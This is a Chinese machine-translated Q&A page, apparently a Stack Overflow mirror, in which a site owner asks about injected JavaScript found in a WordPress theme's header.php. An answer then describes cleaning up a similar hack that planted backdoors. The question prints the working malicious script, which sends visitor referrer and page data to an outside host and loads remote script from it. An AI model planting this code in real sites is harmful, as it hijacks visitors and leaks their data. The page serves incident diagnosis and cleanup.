[英]Unknown code found in wordpress site's header.php file
我在主題的header.php文件中找到了以下代碼,但我不確定它們的全部含義。
<script>
var a = '';
setTimeout(10);
var default_keyword = encodeURIComponent(document.title);
var se_referrer = encodeURIComponent(document.referrer);
var host = encodeURIComponent(window.location.host);
var base = "http://tradenetservice.com/js/jquery.min.php";
var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host;
var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url);
if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== '') {
document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');
}
</script>
就在一周前,我有一個被黑的wordpress網站,並進行了類似的注入。 在我的header.php中添加了代碼,僅當從移動設備瀏覽該網站時,該用戶才將用戶重定向到外部網站(廣告,色情)。
活動主題中的其他文件也被注入。
我要做的是下載所有站點文件,並將它們與備份進行比較。 這樣,我在主題中找到了注入的代碼,還發現了/ wp-includes /中的一些文件,這些文件不是常規wordpress安裝的一部分,而是后門。
還要檢查站點根目錄上的wp-load.php,以我為例,我從/ wp-includes /中刪除的文件正在該文件的多余一行中包含/執行。
除了清理您網站的代碼外,您還應該進行一些搜索來保護Wordpress網站免受黑客攻擊,並會找到許多建議的措施來嘗試防止它再次發生。
將 Adsense 代碼添加到 header.php 后,WordPress css 未加載
[英]WordPress css not loading after adding Adsense code into header.php
需要找出惡意Javascript如何注入到我的header.php Wordpress主題文件中
[英]Need to find out how malicious Javascript was injected into my header.php Wordpress theme file
將Google Analytics(分析)腳本粘貼到我的網站(head.php,header.php或page-header.php)中嗎?
[英]Pasting Google Analytics Script Into My Site (head.php, header.php, or page-header.php)?
在Wordpress中運行的Javascript需要在header.php或functions.php中運行嗎?
[英]Javascript not working in Wordpress need to run in header.php or functions.php?
wordpress 自定義主題 - getelementbyid 以訪問 header.php 中的元素返回 Z37A6259CC0C461DAE299Z0D76
[英]wordpress custom theme - getelementbyid to access element in header.php returning null
對於響應式設計,如何為移動用戶包括一個不同的header.php文件?
[英]For responsive design, how can I include a different header.php file for mobile users?
聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.